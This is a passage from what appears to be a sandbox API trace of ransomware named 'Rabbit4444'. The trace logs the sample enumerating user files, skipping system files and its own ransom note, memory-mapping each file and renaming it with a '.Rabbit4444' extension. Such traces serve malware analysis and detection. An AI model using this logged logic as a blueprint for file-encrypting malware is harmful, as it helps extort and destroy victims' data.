returned -1 [0071.928] lstrcpyW (in: lpString1=0x130ec18, lpString2="3fd7221262d4b2523ae9a6f8daeec21a06a8be356d1e0bf940c7012dae68bb45" | out: lpString1="3fd7221262d4b2523ae9a6f8daeec21a06a8be356d1e0bf940c7012dae68bb45") returned="3fd7221262d4b2523ae9a6f8daeec21a06a8be356d1e0bf940c7012dae68bb45" [0071.928] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\3fd7221262d4b2523ae9a6f8daeec21a06a8be356d1e0bf940c7012dae68bb45", dwFileAttributes=0x0) returned 1 [0071.929] lstrlenW (lpString="3fd7221262d4b2523ae9a6f8daeec21a06a8be356d1e0bf940c7012dae68bb45") returned 64 [0071.929] lstrlenW (lpString="Rabbit4444") returned 10 [0071.929] lstrcmpiW (lpString1="2dae68bb45", lpString2="Rabbit4444") returned -1 [0071.929] lstrlenW (lpString=".dll") returned 4 [0071.929] lstrcmpiW (lpString1="bb45", lpString2=".dll") returned 1 [0071.929] lstrlenW (lpString=".lnk") returned 4 [0071.929] lstrcmpiW (lpString1="bb45", lpString2=".lnk") returned 1 [0071.929] lstrlenW (lpString=".ini") returned 4 [0071.929] lstrcmpiW (lpString1="bb45", lpString2=".ini") returned 1 [0071.929] lstrlenW (lpString=".sys") returned 4 [0071.929] lstrcmpiW (lpString1="bb45", lpString2=".sys") returned 1 [0071.929] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\3fd7221262d4b2523ae9a6f8daeec21a06a8be356d1e0bf940c7012dae68bb45" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\3fd7221262d4b2523ae9a6f8daeec21a06a8be356d1e0bf940c7012dae68bb45"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.929] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.929] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16324002098) returned 1 [0071.929] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=16972) returned 1 [0071.929] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0071.929] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0071.929] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4550, lpName=0x0) returned 0x27c [0071.930] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4550) returned 0x80000 [0071.933] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x110198 [0071.933] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0071.933] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x110198 | out: hHeap=0xe0000) returned 1 [0071.933] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0071.933] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.933] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0071.933] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.933] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0071.933] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16324383835) returned 1 [0071.933] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0071.933] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0071.933] UnmapViewOfFile (lpBaseAddress=0x80000) returned 1 [0071.933] CloseHandle (hObject=0x27c) returned 1 [0071.933] CloseHandle (hObject=0x260) returned 1 [0071.934] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\3fd7221262d4b2523ae9a6f8daeec21a06a8be356d1e0bf940c7012dae68bb45.Rabbit4444") returned 187 [0071.934] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\3fd7221262d4b2523ae9a6f8daeec21a06a8be356d1e0bf940c7012dae68bb45" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\3fd7221262d4b2523ae9a6f8daeec21a06a8be356d1e0bf940c7012dae68bb45"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\3fd7221262d4b2523ae9a6f8daeec21a06a8be356d1e0bf940c7012dae68bb45.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\3fd7221262d4b2523ae9a6f8daeec21a06a8be356d1e0bf940c7012dae68bb45.rabbit4444"), dwFlags=0x1) returned 1 [0071.934] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8934582, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0xb8934582, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xb8a3f4c9, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x20e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4077b637843d9902fd302e3fe9333fa7c251b45a6a75dea6237455d31fc6e2dd", cAlternateFileName="4077B6~1")) returned 1 [0071.934] lstrcmpiW (lpString1="4077b637843d9902fd302e3fe9333fa7c251b45a6a75dea6237455d31fc6e2dd", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.934] lstrcmpiW (lpString1="4077b637843d9902fd302e3fe9333fa7c251b45a6a75dea6237455d31fc6e2dd", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.934] lstrcmpiW (lpString1="4077b637843d9902fd302e3fe9333fa7c251b45a6a75dea6237455d31fc6e2dd", lpString2="Rabbit4444.exe") returned -1 [0071.934] lstrcmpiW (lpString1="4077b637843d9902fd302e3fe9333fa7c251b45a6a75dea6237455d31fc6e2dd", lpString2=".") returned 1 [0071.935] lstrcmpiW (lpString1="4077b637843d9902fd302e3fe9333fa7c251b45a6a75dea6237455d31fc6e2dd", lpString2="..") returned 1 [0071.935] lstrcmpiW (lpString1="4077b637843d9902fd302e3fe9333fa7c251b45a6a75dea6237455d31fc6e2dd", lpString2="windows") returned -1 [0071.935] lstrcmpiW (lpString1="4077b637843d9902fd302e3fe9333fa7c251b45a6a75dea6237455d31fc6e2dd", lpString2="bootmgr") returned -1 [0071.935] lstrcmpiW (lpString1="4077b637843d9902fd302e3fe9333fa7c251b45a6a75dea6237455d31fc6e2dd", lpString2="pagefile.sys") returned -1 [0071.935] lstrcmpiW (lpString1="4077b637843d9902fd302e3fe9333fa7c251b45a6a75dea6237455d31fc6e2dd", lpString2="boot") returned -1 [0071.935] lstrcmpiW (lpString1="4077b637843d9902fd302e3fe9333fa7c251b45a6a75dea6237455d31fc6e2dd", lpString2="ids.txt") returned -1 [0071.935] lstrcmpiW (lpString1="4077b637843d9902fd302e3fe9333fa7c251b45a6a75dea6237455d31fc6e2dd", lpString2="NTUSER.DAT") returned -1 [0071.935] lstrcpyW (in: lpString1=0x130ec18, lpString2="4077b637843d9902fd302e3fe9333fa7c251b45a6a75dea6237455d31fc6e2dd" | out: lpString1="4077b637843d9902fd302e3fe9333fa7c251b45a6a75dea6237455d31fc6e2dd") returned="4077b637843d9902fd302e3fe9333fa7c251b45a6a75dea6237455d31fc6e2dd" [0071.935] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\4077b637843d9902fd302e3fe9333fa7c251b45a6a75dea6237455d31fc6e2dd", dwFileAttributes=0x0) returned 1 [0071.935] lstrlenW (lpString="4077b637843d9902fd302e3fe9333fa7c251b45a6a75dea6237455d31fc6e2dd") returned 64 [0071.935] lstrlenW (lpString="Rabbit4444") returned 10 [0071.935] lstrcmpiW (lpString1="d31fc6e2dd", lpString2="Rabbit4444") returned -1 [0071.935] lstrlenW (lpString=".dll") returned 4 [0071.935] lstrcmpiW (lpString1="e2dd", lpString2=".dll") returned 1 [0071.935] lstrlenW (lpString=".lnk") returned 4 [0071.935] lstrcmpiW (lpString1="e2dd", lpString2=".lnk") returned 1 [0071.935] lstrlenW (lpString=".ini") returned 4 [0071.935] lstrcmpiW (lpString1="e2dd", lpString2=".ini") returned 1 [0071.935] lstrlenW (lpString=".sys") returned 4 [0071.935] lstrcmpiW (lpString1="e2dd", lpString2=".sys") returned 1 [0071.935] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\4077b637843d9902fd302e3fe9333fa7c251b45a6a75dea6237455d31fc6e2dd" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\4077b637843d9902fd302e3fe9333fa7c251b45a6a75dea6237455d31fc6e2dd"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.936] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.936] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16324653084) returned 1 [0071.936] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=526) returned 1 [0071.936] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0071.936] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0071.936] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x510, lpName=0x0) returned 0x27c [0071.937] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x510) returned 0x80000 [0071.939] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x110be8 [0071.939] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0071.939] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x110be8 | out: hHeap=0xe0000) returned 1 [0071.939] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0071.939] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.939] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0071.939] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.939] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0071.939] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16324993636) returned 1 [0071.939] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0071.939] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0071.939] UnmapViewOfFile (lpBaseAddress=0x80000) returned 1 [0071.939] CloseHandle (hObject=0x27c) returned 1 [0071.939] CloseHandle (hObject=0x260) returned 1 [0071.939] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\4077b637843d9902fd302e3fe9333fa7c251b45a6a75dea6237455d31fc6e2dd.Rabbit4444") returned 187 [0071.940] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\4077b637843d9902fd302e3fe9333fa7c251b45a6a75dea6237455d31fc6e2dd" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\4077b637843d9902fd302e3fe9333fa7c251b45a6a75dea6237455d31fc6e2dd"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\4077b637843d9902fd302e3fe9333fa7c251b45a6a75dea6237455d31fc6e2dd.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\4077b637843d9902fd302e3fe9333fa7c251b45a6a75dea6237455d31fc6e2dd.rabbit4444"), dwFlags=0x1) returned 1 [0071.940] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdea4ddd4, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xdea4ddd4, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0xdf4e2622, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x4764, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="40e35bfa16fc9c4d47b66bb7f0542fd2fc1e1f8302dd134e8b224007a55b2856", cAlternateFileName="40E35B~1")) returned 1 [0071.940] lstrcmpiW (lpString1="40e35bfa16fc9c4d47b66bb7f0542fd2fc1e1f8302dd134e8b224007a55b2856", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.940] lstrcmpiW (lpString1="40e35bfa16fc9c4d47b66bb7f0542fd2fc1e1f8302dd134e8b224007a55b2856", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.940] lstrcmpiW (lpString1="40e35bfa16fc9c4d47b66bb7f0542fd2fc1e1f8302dd134e8b224007a55b2856", lpString2="Rabbit4444.exe") returned -1 [0071.940] lstrcmpiW (lpString1="40e35bfa16fc9c4d47b66bb7f0542fd2fc1e1f8302dd134e8b224007a55b2856", lpString2=".") returned 1 [0071.940] lstrcmpiW (lpString1="40e35bfa16fc9c4d47b66bb7f0542fd2fc1e1f8302dd134e8b224007a55b2856", lpString2="..") returned 1 [0071.941] lstrcmpiW (lpString1="40e35bfa16fc9c4d47b66bb7f0542fd2fc1e1f8302dd134e8b224007a55b2856", lpString2="windows") returned -1 [0071.941] lstrcmpiW (lpString1="40e35bfa16fc9c4d47b66bb7f0542fd2fc1e1f8302dd134e8b224007a55b2856", lpString2="bootmgr") returned -1 [0071.941] lstrcmpiW (lpString1="40e35bfa16fc9c4d47b66bb7f0542fd2fc1e1f8302dd134e8b224007a55b2856", lpString2="pagefile.sys") returned -1 [0071.941] lstrcmpiW (lpString1="40e35bfa16fc9c4d47b66bb7f0542fd2fc1e1f8302dd134e8b224007a55b2856", lpString2="boot") returned -1 [0071.941] lstrcmpiW (lpString1="40e35bfa16fc9c4d47b66bb7f0542fd2fc1e1f8302dd134e8b224007a55b2856", lpString2="ids.txt") returned -1 [0071.941] lstrcmpiW (lpString1="40e35bfa16fc9c4d47b66bb7f0542fd2fc1e1f8302dd134e8b224007a55b2856", lpString2="NTUSER.DAT") returned -1 [0071.941] lstrcpyW (in: lpString1=0x130ec18, lpString2="40e35bfa16fc9c4d47b66bb7f0542fd2fc1e1f8302dd134e8b224007a55b2856" | out: lpString1="40e35bfa16fc9c4d47b66bb7f0542fd2fc1e1f8302dd134e8b224007a55b2856") returned="40e35bfa16fc9c4d47b66bb7f0542fd2fc1e1f8302dd134e8b224007a55b2856" [0071.941] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\40e35bfa16fc9c4d47b66bb7f0542fd2fc1e1f8302dd134e8b224007a55b2856", dwFileAttributes=0x0) returned 1 [0071.941] lstrlenW (lpString="40e35bfa16fc9c4d47b66bb7f0542fd2fc1e1f8302dd134e8b224007a55b2856") returned 64 [0071.941] lstrlenW (lpString="Rabbit4444") returned 10 [0071.941] lstrcmpiW (lpString1="07a55b2856", lpString2="Rabbit4444") returned -1 [0071.941] lstrlenW (lpString=".dll") returned 4 [0071.941] lstrcmpiW (lpString1="2856", lpString2=".dll") returned 1 [0071.941] lstrlenW (lpString=".lnk") returned 4 [0071.941] lstrcmpiW (lpString1="2856", lpString2=".lnk") returned 1 [0071.941] lstrlenW (lpString=".ini") returned 4 [0071.941] lstrcmpiW (lpString1="2856", lpString2=".ini") returned 1 [0071.941] lstrlenW (lpString=".sys") returned 4 [0071.941] lstrcmpiW (lpString1="2856", lpString2=".sys") returned 1 [0071.941] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\40e35bfa16fc9c4d47b66bb7f0542fd2fc1e1f8302dd134e8b224007a55b2856" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\40e35bfa16fc9c4d47b66bb7f0542fd2fc1e1f8302dd134e8b224007a55b2856"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.942] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.942] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16325244647) returned 1 [0071.942] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=18276) returned 1 [0071.942] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0071.942] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0071.942] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4a70, lpName=0x0) returned 0x27c [0071.944] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4a70) returned 0x80000 [0071.946] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x110cf0 [0071.946] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0071.946] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x110cf0 | out: hHeap=0xe0000) returned 1 [0071.946] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0071.946] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.947] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0071.947] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.947] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0071.947] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16325751865) returned 1 [0071.947] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0071.947] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0071.947] UnmapViewOfFile (lpBaseAddress=0x80000) returned 1 [0071.947] CloseHandle (hObject=0x27c) returned 1 [0071.947] CloseHandle (hObject=0x260) returned 1 [0071.947] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\40e35bfa16fc9c4d47b66bb7f0542fd2fc1e1f8302dd134e8b224007a55b2856.Rabbit4444") returned 187 [0071.947] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\40e35bfa16fc9c4d47b66bb7f0542fd2fc1e1f8302dd134e8b224007a55b2856" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\40e35bfa16fc9c4d47b66bb7f0542fd2fc1e1f8302dd134e8b224007a55b2856"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\40e35bfa16fc9c4d47b66bb7f0542fd2fc1e1f8302dd134e8b224007a55b2856.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\40e35bfa16fc9c4d47b66bb7f0542fd2fc1e1f8302dd134e8b224007a55b2856.rabbit4444"), dwFlags=0x1) returned 1 [0071.948] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8e0cded, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc8e0cded, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xcac4cbca, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x889, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="43399e8cfdc9ac47fc0bf385b3669ecf51181c3785d40e4dbcdd127b6c51a798", cAlternateFileName="43399E~1")) returned 1 [0071.948] lstrcmpiW (lpString1="43399e8cfdc9ac47fc0bf385b3669ecf51181c3785d40e4dbcdd127b6c51a798", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.948] lstrcmpiW (lpString1="43399e8cfdc9ac47fc0bf385b3669ecf51181c3785d40e4dbcdd127b6c51a798", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.948] lstrcmpiW (lpString1="43399e8cfdc9ac47fc0bf385b3669ecf51181c3785d40e4dbcdd127b6c51a798", lpString2="Rabbit4444.exe") returned -1 [0071.948] lstrcmpiW (lpString1="43399e8cfdc9ac47fc0bf385b3669ecf51181c3785d40e4dbcdd127b6c51a798", lpString2=".") returned 1 [0071.948] lstrcmpiW (lpString1="43399e8cfdc9ac47fc0bf385b3669ecf51181c3785d40e4dbcdd127b6c51a798", lpString2="..") returned 1 [0071.948] lstrcmpiW (lpString1="43399e8cfdc9ac47fc0bf385b3669ecf51181c3785d40e4dbcdd127b6c51a798", lpString2="windows") returned -1 [0071.948] lstrcmpiW (lpString1="43399e8cfdc9ac47fc0bf385b3669ecf51181c3785d40e4dbcdd127b6c51a798", lpString2="bootmgr") returned -1 [0071.948] lstrcmpiW (lpString1="43399e8cfdc9ac47fc0bf385b3669ecf51181c3785d40e4dbcdd127b6c51a798", lpString2="pagefile.sys") returned -1 [0071.948] lstrcmpiW (lpString1="43399e8cfdc9ac47fc0bf385b3669ecf51181c3785d40e4dbcdd127b6c51a798", lpString2="boot") returned -1 [0071.948] lstrcmpiW (lpString1="43399e8cfdc9ac47fc0bf385b3669ecf51181c3785d40e4dbcdd127b6c51a798", lpString2="ids.txt") returned -1 [0071.948] lstrcmpiW (lpString1="43399e8cfdc9ac47fc0bf385b3669ecf51181c3785d40e4dbcdd127b6c51a798", lpString2="NTUSER.DAT") returned -1 [0071.948] lstrcpyW (in: lpString1=0x130ec18, lpString2="43399e8cfdc9ac47fc0bf385b3669ecf51181c3785d40e4dbcdd127b6c51a798" | out: lpString1="43399e8cfdc9ac47fc0bf385b3669ecf51181c3785d40e4dbcdd127b6c51a798") returned="43399e8cfdc9ac47fc0bf385b3669ecf51181c3785d40e4dbcdd127b6c51a798" [0071.948] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\43399e8cfdc9ac47fc0bf385b3669ecf51181c3785d40e4dbcdd127b6c51a798", dwFileAttributes=0x0) returned 1 [0071.949] lstrlenW (lpString="43399e8cfdc9ac47fc0bf385b3669ecf51181c3785d40e4dbcdd127b6c51a798") returned 64 [0071.949] lstrlenW (lpString="Rabbit4444") returned 10 [0071.949] lstrcmpiW (lpString1="7b6c51a798", lpString2="Rabbit4444") returned -1 [0071.949] lstrlenW (lpString=".dll") returned 4 [0071.949] lstrcmpiW (lpString1="a798", lpString2=".dll") returned 1 [0071.949] lstrlenW (lpString=".lnk") returned 4 [0071.949] lstrcmpiW (lpString1="a798", lpString2=".lnk") returned 1 [0071.949] lstrlenW (lpString=".ini") returned 4 [0071.949] lstrcmpiW (lpString1="a798", lpString2=".ini") returned 1 [0071.949] lstrlenW (lpString=".sys") returned 4 [0071.949] lstrcmpiW (lpString1="a798", lpString2=".sys") returned 1 [0071.950] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\43399e8cfdc9ac47fc0bf385b3669ecf51181c3785d40e4dbcdd127b6c51a798" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\43399e8cfdc9ac47fc0bf385b3669ecf51181c3785d40e4dbcdd127b6c51a798"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.950] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.950] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16326068408) returned 1 [0071.950] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=2185) returned 1 [0071.950] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0071.950] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0071.950] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb90, lpName=0x0) returned 0x27c [0071.953] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb90) returned 0x80000 [0071.954] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x1108d0 [0071.954] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0071.954] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1108d0 | out: hHeap=0xe0000) returned 1 [0071.954] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0071.954] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.955] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | 